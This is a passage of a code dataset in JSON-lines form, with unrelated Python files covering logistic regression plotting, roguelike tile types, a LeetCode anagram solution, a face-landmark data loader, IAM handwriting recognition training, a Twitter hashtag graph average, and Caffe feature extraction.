key=operator.itemgetter(1))\n\n# plot logistic loss\nfig = pyplot.figure()\nax = fig.add_subplot(111)\nline1, = ax.plot(train_loss_results, \"g-\", label='train')\nax.annotate('train min', xy=(train_min_index, train_min_value), xytext=(train_min_index, train_min_value),\n arrowprops=dict(facecolor='green', shrink=0.05),)\nline2, = ax.plot(val_loss_results, \"r-\", label='validation')\nax.annotate('validation min', xy=(val_min_index, val_min_value), xytext=(val_min_index, val_min_value),\n arrowprops=dict(facecolor='red', shrink=0.05),)\n\nax.set_ylabel(\"Loss\")\nax.set_xlabel(\"Iterations\")\nax.set_title(\"Logistic Loss\")\n#ax.set_ylim(0,.8)\nax.legend()\npyplot.show()\n\n# use minimum validation to grab best prediction vector\nbest_tr_pred = train_pred[:,val_min_index]\nbest_va_pred = val_pred[:,val_min_index]\nbest_te_pred = test_pred[:,val_min_index]\n\n# calculate logistic regression train error\ntrain_error = int(np.mean(y_train != best_tr_pred) * 100)\nval_error = int(np.mean(y_val != best_va_pred) * 100)\ntest_error = int(np.mean(y_test != best_te_pred) * 100)\n\n# initialize an empty vector for baseline\nbaseline_train = []\nbaseline_val = []\nbaseline_test = []\n\n# add baseline values to vector\nfor index in range(y_train.shape[0]) :\n if(y_train[index] == 0) :\n baseline_train.append(best_tr_pred[index])\nfor index in range(y_val.shape[0]) :\n if(y_val[index] == 0) :\n baseline_val.append(best_va_pred[index])\nfor index in range(y_test.shape[0]) :\n if(y_test[index] == 0) :\n baseline_test.append(best_te_pred[index])\n\n# create zero vector for y baseline\ny_train_baseline = np.zeros(len(baseline_train))\ny_val_baseline = np.zeros(len(baseline_val))\ny_test_baseline = np.zeros(len(baseline_test))\n\n# calculate baseline error\nbase_train_error = int(np.mean(y_train_baseline != baseline_train)*100)\nbase_val_error = int(np.mean(y_val_baseline != baseline_val)*100)\nbase_test_error = int(np.mean(y_test_baseline != baseline_test)*100)\n\n# create log reg table of errors, baseline errors\nprint(\"{: >11} {: >9} {: >9}\".format(\"\", \"log reg\", \"baseline\"))\nprint(\"{: >11} {: >9} {: >9}\".format(\"train\", str(train_error) + \"%\", str(base_train_error) + \"%\"))\nprint(\"{: >11} {: >9} {: >9}\".format(\"validation\", str(val_error) + \"%\", str(base_val_error) + \"%\"))\nprint(\"{: >11} {: >9} {: >9}\".format(\"test\", str(test_error) + \"%\", str(base_test_error) + \"%\"))\n\n# ROC on the test set: score with the unrounded sigmoid outputs of the\n# validation-selected weight vector (hard 0/1 predictions cannot trace a curve)\ny_score = sig_v(np.dot(X_test, weightMatrix[:, val_min_index]))\nfpr, tpr, _ = roc_curve(y_test, y_score)\nroc_auc = auc(fpr, tpr)\n\nfig = pyplot.figure()\nax = fig.add_subplot(111)\nlw = 2\nax.plot(fpr, tpr, color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)\nax.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\nax.set_xlim([0.0, 1.0])\nax.set_ylim([0.0, 1.05])\nax.set_xlabel('False Positive Rate')\nax.set_ylabel('True Positive Rate')\nax.set_title('Receiver operating characteristic')\nax.legend(loc=\"lower right\")\npyplot.show()","sub_path":"gradient_descent.py","file_name":"gradient_descent.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"616088306","text":"from typing import Tuple\n\nimport numpy as np\n\ngraphic_dt = np.dtype(\n\t[\n\t\t(\"ch\", np.int32),\n\t\t(\"fg\", \"3B\"),\n\t\t(\"bg\", \"3B\"),\n\t]\n)\n\n# np.bool_ is the NumPy scalar type; the bare np.bool alias is deprecated\ntile_dt = np.dtype(\n\t[\n\t\t(\"walkable\", np.bool_),\n\t\t(\"transparent\", np.bool_),\n\t\t(\"dark\", graphic_dt),\n\t\t(\"light\", graphic_dt),\n\t]\n)\n\ndef new_tile(\n\t*,\n\twalkable: int,\n\ttransparent: int,\n\tdark: Tuple[int, Tuple[int, int, int], Tuple[int, int, int]],\n\tlight: Tuple[int, Tuple[int, int, int], Tuple[int, int, int]],\n) -> np.ndarray:\n\treturn np.array((walkable, transparent, dark, light), dtype=tile_dt)\n\nSHROUD = np.array((ord(\" \"), (255, 255, 255), (0, 0, 0)), dtype=graphic_dt)\n\n# First set of colors is the graphic, second set is the background\n\nfloor = new_tile(\n\twalkable=True,\n\ttransparent=True,\n\tdark=(ord(\".\"), (161, 192, 207), (0, 0, 0)), #50,50,150 light blue\n\tlight=(ord(\".\"), (255, 255, 0), (0, 0, 0)), #200,180,50 light yellow\n)\nwall = new_tile(\n\twalkable=False,\n\ttransparent=False,\n\tdark=(ord(\"#\"), (161, 192, 207), (0, 0, 0)), #0,0,100 dark blue\n\tlight=(ord(\"#\"), (255, 255, 0), (0, 0, 0)), # 130, 110, 50 light yellow\n)","sub_path":"tile_types.py","file_name":"tile_types.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"163851567","text":"\"\"\"Question: https://leetcode.com/problems/group-anagrams/\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n from collections import defaultdict\n anagrams = defaultdict(list)\n for word in strs:\n letter_cnt = defaultdict(int)\n for w in word:\n letter_cnt[w] += 1\n anagrams['-'.join(\n '{}:{}'.format(k, v)\n for k, v in sorted(letter_cnt.items()))].append(word)\n return list(anagrams.values())\n
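\n# Worked example of the key construction above (added note): \"eat\", \"tea\"\n# and \"ate\" all produce the counts {a:1, e:1, t:1}, hence the shared key\n# 'a:1-e:1-t:1', so the three words land in the same group.\n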
\"3B\"),\n\t\t(\"bg\", \"3B\"),\n\t]\n)\n\ntile_dt = np.dtype(\n\t[\n\t\t(\"walkable\", np.bool),\n\t\t(\"transparent\", np.bool),\n\t\t(\"dark\", graphic_dt),\n\t\t(\"light\", graphic_dt),\n\t]\n)\n\ndef new_tile(\n\t*,\n\twalkable: int,\n\ttransparent: int,\n\tdark: Tuple[int, Tuple[int, int, int], Tuple[int, int, int]],\n\tlight: Tuple[int, Tuple[int, int, int], Tuple[int, int, int]],\n) -> np.ndarray:\n\treturn np.array((walkable, transparent, dark, light), dtype=tile_dt)\n\nSHROUD = np.array((ord(\" \"), (255, 255, 255), (0, 0, 0)), dtype=graphic_dt)\n\n# First set of colors is the graphic, second set is the background\n\nfloor = new_tile(\n\twalkable=True,\n\ttransparent=True,\n\tdark=(ord(\".\"), (161, 192, 207), (0, 0, 0)), #50,50,150 light blue\n\tlight=(ord(\".\"), (255, 255, 0), (0, 0, 0)), #200,180,50 light yellow\n)\nwall = new_tile(\n\twalkable=False,\n\ttransparent=False,\n\tdark=(ord(\"#\"), (161, 192, 207), (0, 0, 0)), #0,0,100 dark blue\n\tlight=(ord(\"#\"), (255, 255, 0), (0, 0, 0)), # 130, 110, 50 light yellow\n)","sub_path":"tile_types.py","file_name":"tile_types.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"163851567","text":"\"\"\"Question: https://leetcode.com/problems/group-anagrams/\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n from collections import defaultdict\n anagrams = defaultdict(list)\n for word in strs:\n letter_cnt = defaultdict(int)\n for w in word:\n letter_cnt[w] += 1\n anagrams['-'.join(\n '{}:{}'.format(k, v)\n for k, v in sorted(letter_cnt.items()))].append(word)\n return list(anagrams.values())\n\n\nif __name__ == '__main__':\n strs = [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]\n output = Solution().groupAnagrams(strs)\n print(f'strs: {strs}, output: {output}')\n","sub_path":"49-group-anagrams.py","file_name":"49-group-anagrams.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"203210816","text":"from functools import partial\nfrom menpo.shape.pointcloud import PointCloud\nfrom menpofit.builder import compute_reference_shape\nfrom menpofit.builder import rescale_images_to_reference_shape\nfrom menpofit.fitter import (noisy_shape_from_bounding_box, align_shape_with_bounding_box)\nfrom pathlib import Path\n\nimport joblib\nimport menpo.feature\nimport menpo.image\nimport menpo.io as mio\nimport numpy as np\nimport tensorflow as tf\nimport utils\n\n\ndef build_reference_shape(paths, diagonal=200):\n \"\"\"Builds the reference shape.\n\n Args:\n paths: paths that contain the ground truth landmark files.\n diagonal: the diagonal of the reference shape in pixels.\n Returns:\n the reference shape.\n \"\"\"\n landmarks = []\n for path in paths:\n path = Path(path).parent.as_posix()\n landmarks += [group.lms\n for group in mio.import_landmark_files(\n path, verbose=True) if group.lms.n_points == 68]\n\n return compute_reference_shape(landmarks, diagonal=diagonal).points.astype(np.float32)\n\n\ndef grey_to_rgb(im):\n \"\"\"Converts menpo Image to rgb if greyscale\n\n Args:\n im: menpo Image with 1 or 3 channels.\n Returns:\n Converted menpo `Image'.\n \"\"\"\n assert im.n_channels in [1, 3]\n\n if im.n_channels == 3:\n return im\n\n im.pixels = np.vstack([im.pixels] * 3)\n return im\n\n\ndef get_noisy_init_from_bb(reference_shape, bb, noise_percentage=.02):\n \"\"\"Roughly 
aligns a reference shape to a bounding box.\n\n This adds some uniform noise for translation and scale to the\n aligned shape.\n\n Args:\n reference_shape: a numpy array [num_landmarks, 2]\n bb: bounding box, a numpy array [4, ]\n noise_percentage: noise presentation to add.\n Returns:\n The aligned shape, as a numpy array [num_landmarks, 2]\n \"\"\"\n bb = PointCloud(bb)\n reference_shape = PointCloud(reference_shape)\n\n bb = noisy_shape_from_bounding_box(\n reference_shape, bb, \n noise_percentage=[noise_percentage, 0, noise_percentage]\n ).bounding_box()\n\n return align_shape_with_bounding_box(reference_shape, bb).points\n\n\ndef load_image(path, reference_shape, is_training=False, group='PTS'):\n \"\"\"Load an annotated image.\n\n In the directory of the provided image file, there\n should exist a landmark file (.pts) with the same\n basename as the image file.\n\n Args:\n path: a path containing an image file.\n reference_shape: a numpy array [num_landmarks, 2]\n is_training: whether in training mode or not.\n group: landmark group containing the grounth truth landmarks.\n Returns:\n pixels: a numpy array [width, height, 3].\n estimate: an initial estimate a numpy array [68, 2].\n gt_truth: the ground truth landmarks, a numpy array [68, 2].\n \"\"\"\n im = mio.import_image(path)\n bb_root = im.path.parent.relative_to(im.path.parent.parent.parent)\n if 'set' not in str(bb_root):\n bb_root = im.path.parent.relative_to(im.path.parent.parent)\n\n im.landmarks['bb'] = mio.import_landmark_file(str(Path('bbs') / bb_root / (im.path.stem + '.pts')))\n\n im = im.crop_to_landmarks_proportion(0.3, group='bb')\n reference_shape = PointCloud(reference_shape)\n if np.random.rand() < .5:\n im = utils.mirror_image(im)\n\n bb = im.landmarks['bb'].lms.bounding_box()\n\n im.landmarks['__initial'] = align_shape_with_bounding_box(reference_shape, bb)\n im = im.rescale_to_pointcloud(reference_shape, group='__initial')\n\n lms = im.landmarks[group].lms\n initial = im.landmarks['__initial'].lms\n\n # if the image is greyscale then convert to rgb.\n pixels = grey_to_rgb(im).pixels.transpose(1, 2, 0)\n\n gt_truth = lms.points.astype(np.float32)\n estimate = initial.points.astype(np.float32)\n return pixels.astype(np.float32).copy(), gt_truth, estimate\n\n\ndef distort_color(image, thread_id=0, scope=None):\n \"\"\"Distort the color of the image.\n Each color distortion is non-commutative and thus ordering of the color ops\n matters. Ideally we would randomly permute the ordering of the color ops.\n Rather then adding that level of complication, we select a distinct ordering\n of color ops for each preprocessing thread.\n Args:\n image: Tensor containing single image.\n thread_id: preprocessing thread ID.\n scope: Optional scope for op_scope.\n Returns:\n color-distorted image\n \"\"\"\n with tf.op_scope([image], scope, 'distort_color'):\n color_ordering = thread_id % 2\n\n if color_ordering == 0:\n image = tf.image.random_brightness(image, max_delta=32. / 255.)\n image = tf.image.random_saturation(image, lower=0.5, upper=1.5)\n image = tf.image.random_hue(image, max_delta=0.2)\n image = tf.image.random_contrast(image, lower=0.5, upper=1.5)\n elif color_ordering == 1:\n image = tf.image.random_brightness(image, max_delta=32. 
/ 255.)\n image = tf.image.random_contrast(image, lower=0.5, upper=1.5)\n image = tf.image.random_saturation(image, lower=0.5, upper=1.5)\n image = tf.image.random_hue(image, max_delta=0.2)\n\n # The random_* ops do not necessarily clamp.\n image = tf.clip_by_value(image, 0.0, 1.0)\n return image\n\ndef batch_inputs(paths, reference_shape,\n batch_size=32, is_training=False, num_landmarks=68):\n \"\"\"Reads the files off the disk and produces batches.\n\n Args:\n paths: a list of directories that contain training images and\n the corresponding landmark files.\n reference_shape: a numpy array [num_landmarks, 2]\n batch_size: the batch size.\n is_traininig: whether in training mode.\n num_landmarks: the number of landmarks in the training images.\n Returns:\n images: a tf tensor of shape [batch_size, width, height, 3].\n lms: a tf tensor of shape [batch_size, 68, 2].\n lms_init: a tf tensor of shape [batch_size, 68, 2].\n \"\"\"\n\n files = tf.concat(0, [tf.matching_files(d) for d in paths])\n\n filename_queue = tf.train.string_input_producer(\n files, shuffle=is_training, capacity=1000)\n\n image, lms, lms_init = tf.py_func(\n partial(load_image, is_training=is_training),\n [filename_queue.dequeue(), reference_shape], # input arguments\n [tf.float32, tf.float32, tf.float32], # output types\n name='load_image'\n )\n\n # The image has always 3 channels.\n image.set_shape([None, None, 3])\n\n if is_training:\n image = distort_color(image)\n\n lms = tf.reshape(lms, [num_landmarks, 2])\n lms_init = tf.reshape(lms_init, [num_landmarks, 2])\n\n images, lms, inits = tf.train.batch(\n [image, lms, lms_init],\n batch_size=batch_size,\n num_threads=4,\n capacity=1000,\n enqueue_many=False,\n dynamic_pad=True\n )\n\n return images, lms, inits\n","sub_path":"data_provider.py","file_name":"data_provider.py","file_ext":"py","file_size_in_byte":6851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"420994703","text":"import sys\n\nimport Levenshtein as leven\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom colorama import Fore\nfrom skimage.color import rgb2gray\nfrom skimage.transform import rotate\nfrom torch import nn, optim\nfrom torch.utils.data import SubsetRandomSampler, DataLoader\nfrom tqdm import tqdm\n\nfrom dataset import IAMData\nfrom model import IAMModel\n\nnp.random.seed(42)\ntorch.manual_seed(42)\ndev = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n# ============================================= PREPARING DATASET ======================================================\ndataset = IAMData(txt_file='./dataset/lines.txt',\n root_dir='./dataset',\n output_size=(64, 800),\n border_pad=(4, 10))\n\nclasses = ''.join(dataset.char_dict.keys())\ntext_file = open(\"chars.txt\", \"w\", encoding='utf-8')\ntext_file.write('\\n'.join([x if x != '#' else '\\\\#' for x in dataset.char_dict.keys()]))\ntext_file.close()\n\n\ndef collate(batch):\n images, words = [b.get('image') for b in batch], [b.get('word') for b in batch]\n images = torch.stack(images, 0)\n # Calculate target lengths for the current batch\n lengths = [len(word) for word in words]\n # According to https://pytorch.org/docs/stable/generated/torch.nn.CTCLoss.html\n # Tensor of size sum(target_lengths) the targets are assumed to be un-padded and concatenated within 1 dimension.\n targets = torch.empty(sum(lengths)).fill_(len(classes)).long()\n lengths = torch.tensor(lengths)\n # Now we need to fill targets according to calculated 
lengths\n for j, word in enumerate(words):\n start = sum(lengths[:j])\n end = lengths[j]\n targets[start:start + end] = torch.tensor([dataset.char_dict.get(letter) for letter in word]).long()\n return images.to(dev), targets.to(dev), lengths.to(dev)\n\n\n# ================================================= MODEL ==============================================================\nmodel = IAMModel(time_step=96,\n feature_size=512,\n hidden_size=512,\n output_size=len(classes) + 1,\n num_rnn_layers=4)\nmodel.to(dev)\n\n\n# ================================================ TRAINING MODEL ======================================================\ndef fit(model, epochs, train_data_loader, valid_data_loader, lr=1e-3, wd=1e-2, betas=(0.9, 0.999)):\n best_leven = 1000\n opt = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=lr,\n weight_decay=wd, betas=betas)\n opt.zero_grad(set_to_none=False)\n len_train = len(train_data_loader)\n loss_func = nn.CTCLoss(reduction='sum', zero_infinity=True, blank=len(classes))\n for i in range(1, epochs + 1):\n # ============================================ TRAINING ========================================================\n batch_n = 1\n train_levenshtein = 0\n len_levenshtein = 0\n for xb, yb, lens in tqdm(train_data_loader,\n position=0, leave=True,\n file=sys.stdout, bar_format=\"{l_bar}%s{bar}%s{r_bar}\" % (Fore.GREEN, Fore.RESET)):\n model.train()\n # And the lengths are specified for each sequence to achieve masking\n # under the assumption that sequences are padded to equal lengths.\n input_lengths = torch.full((xb.size()[0],), model.time_step, dtype=torch.long)\n loss_func(model(xb).log_softmax(2).requires_grad_(), yb, input_lengths, lens).backward()\n opt.step()\n opt.zero_grad(set_to_none=False)\n # ================================== TRAINING LEVENSHTEIN DISTANCE =========================================\n if batch_n > (len_train - 5):\n model.eval()\n with torch.no_grad():\n decoded = model.beam_search_with_lm(xb)\n for j in range(0, len(decoded)):\n # We need to find actual string somewhere in the middle of the 'targets'\n # tensor having tensor 'lens' with known lengths\n actual = yb.cpu().numpy()[0 + sum(lens[:j]): sum(lens[:j]) + lens[j]]\n train_levenshtein += leven.distance(''.join([letter for letter in decoded[j]]), ''.join([decode_map.get(letter.item()) for letter in actual[:]]))\n len_levenshtein += sum(lens).item()\n\n batch_n += 1\n\n # ============================================ VALIDATION ======================================================\n model.eval()\n with torch.no_grad():\n val_levenshtein = 0\n target_lengths = 0\n for xb, yb, lens in tqdm(valid_data_loader,\n position=0, leave=True,\n file=sys.stdout, bar_format=\"{l_bar}%s{bar}%s{r_bar}\" % (Fore.BLUE, Fore.RESET)):\n decoded = model.beam_search_with_lm(xb)\n for j in range(0, len(decoded)):\n actual = yb.cpu().numpy()[0 + sum(lens[:j]): sum(lens[:j]) + lens[j]]\n val_levenshtein += leven.distance(''.join([letter for letter in decoded[j]]), ''.join([decode_map.get(letter.item()) for letter in actual[:]]))\n target_lengths += sum(lens).item()\n\n print('epoch {}: Train Levenshtein {} | Validation Levenshtein {}'\n .format(i, train_levenshtein / len_levenshtein, val_levenshtein / target_lengths), end='\\n')\n # ============================================ SAVE MODEL ======================================================\n if (val_levenshtein / target_lengths) < best_leven:\n torch.save(model.state_dict(), f=str((val_levenshtein / target_lengths) * 100).replace('.', '_') 
+ '_' + 'model.pth')\n best_leven = val_levenshtein / target_lengths\n\n\ntrain_batch_size = 60\nvalidation_batch_size = 40\ndataset_size = len(dataset)\nindices = list(range(dataset_size))\nsplit = int(np.floor(0.2 * dataset_size))\ndecode_map = {v: k for k, v in dataset.char_dict.items()}\nnp.random.shuffle(indices)\ntrain_indices, val_indices = indices[split:], indices[:split]\n\ntrain_sampler = SubsetRandomSampler(train_indices)\nvalid_sampler = SubsetRandomSampler(val_indices)\n\ntrain_loader = DataLoader(dataset, batch_size=train_batch_size, sampler=train_sampler, collate_fn=collate)\nvalidation_loader = DataLoader(dataset, batch_size=validation_batch_size, sampler=valid_sampler, collate_fn=collate)\nprint(\"Training...\")\nfit(model=model, epochs=22, train_data_loader=train_loader, valid_data_loader=validation_loader)\n\n\n# ============================================ TESTING =================================================================\ndef batch_predict(model, valid_dl, up_to):\n # next(iter(...)) rather than iter(...).next(): the .next() method is Python 2 only\n xb, yb, lens = next(iter(valid_dl))\n model.eval()\n with torch.no_grad():\n outs = model.beam_search_with_lm(xb)\n for i in range(len(outs)):\n start = sum(lens[:i])\n end = lens[i].item()\n corr = ''.join([decode_map.get(letter.item()) for letter in yb[start:start + end]])\n predicted = ''.join([letter for letter in outs[i]])\n # ============================================ SHOW IMAGE ==================================================\n img = xb[i, :, :, :].permute(1, 2, 0).cpu().numpy()\n img = rgb2gray(img)\n img = rotate(img, angle=90, clip=False, resize=True)\n f, ax = plt.subplots(1, 1)\n mpl.rcParams[\"font.size\"] = 8\n ax.imshow(img, cmap='gray')\n mpl.rcParams[\"font.size\"] = 14\n plt.gcf().text(x=0.1, y=0.1, s=\"Actual: \" + str(corr))\n plt.gcf().text(x=0.1, y=0.2, s=\"Predicted: \" + str(predicted))\n f.set_size_inches(10, 3)\n print('actual: {}'.format(corr))\n print('predicted: {}'.format(predicted))\n if i + 1 == up_to:\n break\n plt.show()\n\n\nbatch_predict(model=model, valid_dl=validation_loader, up_to=20)\n","sub_path":"iam.py","file_name":"iam.py","file_ext":"py","file_size_in_byte":8079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
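# A minimal, self-contained sketch (toy sizes only, not taken from iam.py) of the CTC
# bookkeeping that fit() above relies on: nn.CTCLoss expects log-probs of shape (T, N, C),
# per-sample input lengths (here the model's fixed time_step repeated N times), and the
# labels concatenated into one flat 1-D tensor sliced by per-sample lengths, which is why
# fit() recovers each word with sum(lens[:j]). All sizes below are made-up toy values.
import torch
import torch.nn as nn

T, N, C = 96, 2, 80                        # time steps, batch size, classes incl. blank
log_probs = torch.randn(T, N, C).log_softmax(2)
targets = torch.randint(0, C - 1, (7,))    # two labels of lengths 3 and 4, concatenated
target_lengths = torch.tensor([3, 4])
input_lengths = torch.full((N,), T, dtype=torch.long)
ctc = nn.CTCLoss(reduction='sum', zero_infinity=True, blank=C - 1)
loss = ctc(log_probs, targets, input_lengths, target_lengths)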
+{"seq_id":"84512961","text":"import re\nimport datetime\nfrom collections import deque\nimport sys, getopt\n\nclass Node:\n\tdef __init__(self, name=None):\n\t\tself.neighbors = {}\n\t\tself.date_added = {}\n\t\tself.name = name\n\n\t\n\tdef addNeighbor(self, name, node):\n\t\tif name not in self.neighbors:\n\t\t\tself.neighbors[name] = node\n\n\tdef removeNeighbors(self, list_datetime, node_set):\n\t\tif node_set:\n\t\t\tlast_node = self.neighbors[node_set[-1]]\n\t\telse:\n\t\t\treturn;\n\n\t\tfor node_name in node_set:\n\t\t\tnode = self.neighbors[node_name]\n\t\t\t# Get the datetime from the node\n\t\t\tlast_modified_date = self.date_added[node_name]\n\t\t\t#If the date outside of our window is the date that the node's edge was last modified, remove it\n\t\t\tif last_modified_date == list_datetime:\n\t\t\t\t#Delete this node's ref to the other node\n\t\t\t\tdel self.date_added[node_name]\n\t\t\t\tdel self.neighbors[node_name]\n\t\t\t\t#Delete the other node's ref to this node\n\t\t\t\tdel node.date_added[self.name]\n\t\t\t\tdel node.neighbors[self.name]\n\t\t\t\t#Tell the caller that we deleted\n\n\t\t#Remove the node we are about to traverse to\n\t\tnode_set.pop()\n\n\t\t#Call removeNeighbors on the next node\n\t\tlast_node.removeNeighbors(list_datetime, node_set)\n\n\tdef addNeighbors(self, curr_datetime, nodes):\n\t\tif nodes:\n\t\t\tlast_node = nodes[-1]\n\t\telse:\n\t\t\treturn;\n\n\t\tfor node in nodes:\n\t\t\t#If the edge already exists, we update the dates added\n\n\t\t\tif node.name in self.neighbors:\n\t\t\t\tself.date_added[node.name] = curr_datetime\n\t\t\t\tnode.date_added[self.name] = curr_datetime\n\t\t\t#Otherwise, we add the connection between the two nodes and add the dates\n\t\t\telse:\n\t\t\t\tself.date_added[node.name] = curr_datetime\n\t\t\t\tnode.date_added[self.name] = curr_datetime\n\n\t\t\t\tself.neighbors[node.name] = node\n\t\t\t\tnode.neighbors[self.name] = self\n\n\t\t#Remove the node we are about to traverse to\n\t\tnodes.pop()\n\n\t\t#Call addNeighbors on the next node\n\t\tlast_node.addNeighbors(curr_datetime, nodes) \n \n\tdef __getitem__(self, key):\n\t\treturn self.neighbors[key]\n\nclass RollingAverageParser:\n\tdef __init__(self, filename, outfile_name):\n\t\t#hashtag -> Node\n\t\tself.hashtag_map = {}\n\n\t\t#datestring -> List of Nodes\n\t\tself.date_map = {}\n\n\t\t#List of dates\n\t\tself.included_dates = []\n\n\t\t#The generated output from the \n\t\tself.tweetfile = open(filename)\n\n\t\tself.outfile_name = outfile_name\n\n\tdef parse_datetime(self, tweet):\n\t\tif tweet:\n\t\t\tr = re.search(\"timestamp: \", tweet)\n\t\t\tif r:\n\t\t\t\tend = r.end()\n\t\t\t\tdatetime = tweet[end:-2]\n\t\t\t\treturn datetime\n\n\t\treturn None\n\n\tdef parse_hashtags(self, tweet):\n\t\tif tweet:\n\t\t\thashtags = {tag.strip(\"#\") for tag in tweet.split() if tag.startswith(\"#\")}\n\t\t\thashtags = set([x.lower() for x in hashtags])\n\t\t\t#print hashtags\n\t\t\treturn hashtags\n\n\t\treturn None\n\n\tdef remove_from_window(self, list_datetime):\n\t\tif list_datetime in self.date_map:\n\t\t\t# Get the nodes that were added/updated on this date\n\t\t\tnode_set = list(self.date_map[list_datetime])\n\n\t\t\t#Get the first node\n\t\t\tfirst_node = self.hashtag_map[node_set.pop()]\n\n\n\t\t\t#Tell the first node to remove all its matching neighbors\n\t\t\tfirst_node.removeNeighbors(list_datetime,node_set)\n\n\t\t\t#If the node has no neighbors, remove them permanently\n\t\t\tnode_set_a = list(self.date_map[list_datetime])\n\n\t\t\tfor node_name in node_set_a:\n\t\t\t\tif len(self.hashtag_map[node_name].neighbors) == 0:\n\t\t\t\t\tdel self.hashtag_map[node_name]\n\n\t\t\t#At this point, we have removed all edges added on the specified date, so we can remove the date_map entry\n\t\t\tdel self.date_map[list_datetime]\n\n\tdef get_weight(self):\n\t\tweight = 0\n\t\tdenom = len(self.hashtag_map)\n\t\t# print \"The number of nodes is: \" + str(denom)\n\t\t# print '\\n'\n\t\tif denom == 0:\n\t\t\treturn 0\n\t\telse:\n\t\t\tfor key,value in self.hashtag_map.iteritems():\n\t\t\t\t# print \"For the key: \" + str(key) + \" the number of neighbors is: \" + str(len(value.neighbors))\n\t\t\t\t# for k1,node in value.neighbors.iteritems():\n\t\t\t\t# print str(k1)\n\t\t\t\tweight += len(value.neighbors) \n\n\t\t\ttotal_weight = weight / float(denom)\n\t\t\treturn round(total_weight,2)\n\n\n\tdef read_tweets(self):\n\t\twith open(self.outfile_name, 'w') as outfile:\n\t\t\tfor tweet in self.tweetfile:\n\t\t\t\tdatetime_str = self.parse_datetime(tweet)\n\n\t\t\t\tif not datetime_str:\n\t\t\t\t\tcontinue;\n\n\t\t\t\thashtags = self.parse_hashtags(tweet)\n\t\t\t\tcurrent_datetime = datetime.datetime.strptime(datetime_str,'%a %b %d %H:%M:%S +0000 %Y') - datetime.timedelta(0,60)\n\t\t\t\tnum_dates_removed = 0\n\t\t\t\tfor date in self.included_dates:\n\t\t\t\t\tlist_datetime 
= datetime.datetime.strptime(date,'%a %b %d %H:%M:%S +0000 %Y')\n\n\t\t\t\t\t#if the value is outside of our window\n\t\t\t\t\tif current_datetime > list_datetime:\n\t\t\t\t\t\tself.remove_from_window(date)\n\t\t\t\t\t\tnum_dates_removed += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t#Remove the dates that are outside of the window\n\t\t\t\tif num_dates_removed:\n\t\t\t\t\tself.included_dates = self.included_dates[num_dates_removed:]\n\t\t\t\t\tnum_dates_removed = 0\n\n\t\t\t\t#Add or update the tree with the hashtags of the tweets we are currently looking at\n\t\t\t\tif hashtags and len(hashtags) > 1:\n\t\t\t\t\tself.date_map[datetime_str] = hashtags\n\t\t\t\t\tself.included_dates.append(datetime_str)\t\t\t\n\n\t\t\t\t\tcurrent_nodes = []\n\t\t\t\t\t#Add the new nodes to a temp list\n\t\t\t\t\tfor tag in hashtags:\n\t\t\t\t\t\tif tag in self.hashtag_map: \n\t\t\t\t\t\t\tcurrent_nodes.append(self.hashtag_map[tag])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnew_node = Node(tag)\n\t\t\t\t\t\t\tcurrent_nodes.append(new_node)\n\t\t\t\t\t\t\tself.hashtag_map[tag] = new_node\t\t\t\n\n\t\t\t\t\t#Tell the first node to start adding neighbors based on the passed in list\n\t\t\t\t\tfirst_node = current_nodes.pop()\n\t\t\t\t\tfirst_node.addNeighbors(datetime_str, current_nodes)\n\n\t\t\t\t#Calculate the weight once the tree has finished being parsed\n\t\t\t\tweight = self.get_weight()\n\t\t\t\toutfile.write(str(weight) + '\\n')\n\n\ndef main(argv):\n\n\tpath = argv[1]\n\toutfile = argv[2]\n\n\trap = RollingAverageParser(path, outfile)\n\trap.read_tweets()\n\nif __name__ == \"__main__\":\n main(sys.argv)\n\n","sub_path":"src/average_degree.py","file_name":"average_degree.py","file_ext":"py","file_size_in_byte":5767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"109201103","text":"#!/usr/bin/env python2\n\"\"\"Feature extraction with Caffe python wrapper.\n\nCommand Line Usage: python feature_extraction.py net.prototxt .caffemodel mean.npy file_list.txt output_name \\\n-m mode -g gpu_num -l layer -b batch_size\nmode: {\"single\", \"multi\"}, optional.\ngpu_num: the total number of used gpu if mode = \"multi\", or the gpu device number if mode = \"single\", optional.\nlayer: the CaffeNet layer, optional.\nbatch size: the CaffeNet batch size, optional.\n\"\"\"\nfrom __future__ import print_function\nimport sys\nimport argparse\nimport os\nimport traceback\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import ImageFile\nimport multiprocessing\nimport caffe\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\n\ndef read_file_list(file_list):\n \"\"\"Read file_list.\n \n Remove labels in the .txt file and return an image path list.\n \n :param file_list: a .txt file path.\n :return: a list contains all image paths.\n \"\"\"\n image_list = []\n try:\n with open(file_list) as f:\n image_list = [line.strip().split()[0] for line in f]\n except IOError as e:\n print(repr(e))\n else:\n print(\"total %d images\" % len(image_list))\n finally:\n return image_list\n\n\ndef layer_shape(model_def, model_weights):\n \"\"\"Show layers shape.\n \n For each layer, let's look at the activation shapes,\n which typically have the form (batch_size, channel_dim, height, width).\n The activations are exposed as an 